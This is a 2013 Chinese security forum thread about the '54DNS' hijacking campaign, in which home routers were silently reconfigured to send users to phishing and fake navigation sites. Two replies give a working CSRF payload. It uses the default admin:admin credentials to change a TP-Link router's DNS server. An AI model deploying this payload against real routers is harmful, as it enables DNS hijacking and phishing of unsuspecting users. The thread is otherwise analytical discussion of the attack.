54dns劫持实现dns钓鱼攻击威胁？

xsser (十根阳具有长短!!) | 2013-05-21 12:10

来自腾讯电脑管家的安全团队同步启动了针对此次DNS劫持攻击的数据监测，显示已至少有4%的全网用户受到感染。腾讯电脑管家安全专家、高级技术总监李旭阳表示，以全网2亿用户进行估算，每天至少有800万用户处于DNS钓鱼攻击威胁中，黑客可以随时发动针对网民的钓鱼欺诈攻击。

除DNS关联IP被篡改为钓鱼欺诈网址外，此次DNS劫持攻击的另一个典型特性是劫持流量巨大的导航站，诸如hao360.cn、hao123.com均未能幸免。腾讯副总裁曾宇表示，这种针对导航站的DNS劫持，主要以骗取流量为目的，在此前并不多见；比如用户打开的是hao123.com网站，实际上黑客已经劫持跳转到另外一个虚假的导航站页面，通过这种手段骗取大量用户点击，最终通过流量变现。这是典型的商业犯罪行为，具有明显的商业目的性。

http://guanjia.qq.com/news/n1/201305/17_173.html

大乌云起码超过100个人了，求一个样本分析下......

1#

猫头鹰 (啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦) | 2013-05-21 12:11

我记得我大天朝的电信和联通dns劫持用户

2#

xsser (十根阳具有长短!!) | 2013-05-21 12:13

@猫头鹰 这个不是这个原理啊 哥

3#

missdiog | 2013-05-21 13:04

CSRF改家庭路由器的主DNS IP为攻击者的DNS服务器，然后自己的dns服务器想怎么解析就怎么解析。

4#

xsser (十根阳具有长短!!) | 2013-05-21 13:04

@missdiog 这是官方说辞啊 有木有实际的代码啊

5#

missdiog | 2013-05-21 13:11

@xsser

<script>

function dns(){

alert('I have changed your dns on my domain!')

i = new Image;

i.src='http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6';

}

</script>

<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=dns()>

link:Http Authentication Url and csrf = Router Hacking, Csrf入侵内网路由器

6#

Rookie | 2013-05-21 13:14

官方说 受害用户面积很大.360导航也在其中..为什么没有其他的相关新闻啊..

7#

海盗湾V | 2013-05-21 13:26

方法五六年前就有了，没被重视，现在又被人利用了。路由器不用默认密码就没事。

相关资源

1. 史上最大规模“54DNS劫持”已得到有效遏制

http://www.itbear.com.cn/ZiXun/2013-05/81995.html

2. Http Authentication Url and csrf = Router Hacking !!!

http://hi.baidu.com/kpstfbahmmalqre/item/008121262c7802112b0f1c89

3. @ftofficer_张聪 在微博上推荐的Blended Threats and JavaScript: A Plan for Permanent Network Compromise 值得一看：

http://media.blackhat.com/bh-us-12/Briefings/Purviance/BH_US_12_Purviance_Blended_Threats_WP.pdf

http://l4.yunpan.cn/lk/Q5PA6rGSUPUmI

4. CSRF-苏醒的巨人

http://vdisk.weibo.com/s/meqNz

5. JavaScript安全从浏览器到服务端

http://vdisk.weibo.com/s/mernF

8#

xsser (十根阳具有长短!!) | 2013-05-21 14:04

@海盗湾V @Rookie @missdiog 你们说的都是理论上的技术讨论，我想看看实际中的攻击代码，或者攻击根本就没发生？

9#

Clouds | 2013-05-21 14:05

@xsser 哥……为毛不给我答复………

10#

淡漠天空 (路人的世界) | 2013-05-21 14:10

@xsser 已发生  已中枪

11#

xsser (十根阳具有长短!!) | 2013-05-21 14:12

@淡漠天空 详细说说 @Clouds  怎么了？

12#

Clouds | 2013-05-21 14:16

@xsser 我pm你很多次了…只想问问xsser的数据还在吗…？如果在可以把我的数据帮我拖下来一下吗…因为事先没有提示…我也没有备份…现在很需要里面一条数据…

13#

xsser (十根阳具有长短!!) | 2013-05-21 14:19

@Clouds 可以的，我们准备把那个代码和数据都提供下载的

14#

淡漠天空 (路人的世界) | 2013-05-21 14:20

@xsser 360导航劫持  自动跳转   不知道是不是这个

15#

疯狗 (谁淫荡啊谁淫荡) | 2013-05-21 14:21

@淡漠天空 快查查浏览记录，另外这个360的云应该有记录吧

16#

Clouds | 2013-05-21 14:21

@xsser 求准确时间……因为等了很多天了都是开源准备中…纠结啊…

17#

missdiog | 2013-05-21 14:27

@xsser code就是上面的啊，在页面上面挂类似上面的code，然后用户浏览后，CSRF更改路由器的DNS为恶意DNS，攻击者在恶意DNS上将某些域名解析到自己的网页。攻击完成。

重点就是csrf更改路由器的DNS服务器。没有什么高深的东西

18#

淡漠天空 (路人的世界) | 2013-05-21 14:37

url：http://an.moonbasa.com/transfer.aspx?cn=22569&type=0&adsiteid=10000007&url=http://www.moonbasa.com/?oid=5    早上一直是这个自动跳转

19#

_Evil (年轻人切忌浮躁,性趣是最好的导师.) | 2013-05-21 14:42

@疯狗 @xsser 两位wooyun高管。 看了看腾讯牛逼哄哄的说,原来是CSRF路由器欺骗DNS. 不过,攻击者整套攻击方法我很想晓得代码怎么样滴。嘎嘎。。。

20#

p.z (一回头 青春都喂了狗) | 2013-05-21 14:46

@xsser 华硕、TP-LINK等路由器遭黑客攻击

没事少听点摇滚民谣 多读书多看报

21#

蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-05-21 14:49

@_Evil CSRF直接修改掉路由器的DNS地址为自己的DNS IP，然后攻击者直接控制自己的DNS就可以了。

<script>

function dns(){

alert('I have changed your dns on my domain!')

i = new Image;

i.src='http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6';

}

</script>

<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=dns()>

目测该code可行。

22#

xsser (十根阳具有长短!!) | 2013-05-21 15:01

@蟋蟀哥哥 @p.z 我找得到很多可行的办法，我要的不是证明这个东西的可行性，而是要真实情况里的代码，有谁能给出一个被证明的是54dns攻击的代码么，或者谁在网页里看到过这个攻击么?？

23#

rayh4c (请不要叫我茄子。) | 2013-05-21 15:07

@xsser http://www.baidu.com/s?ie=utf-8&bs=66.102.253.51&f=8&rsv_bp=1&wd=66.102.253+8.8.8.8&rsv_sug3=2&rsv_sug=1&rsv_sug1=2&rsv_sug4=21&rsv_n=2&inputT=3964 能搜到些被攻击的人

24#

xsser (十根阳具有长短!!) | 2013-05-21 16:49

@rayh4c 收到... 也就2页啊

25#

bittertea (Bittertea.pw) | 2013-05-21 19:03

黑产也做得越来越有技术了。

26#

YKS (??????????????????????????????????????????????????????????????) | 2013-05-21 21:43

要是配合之前的百度贴吧XSS就屌炸天了。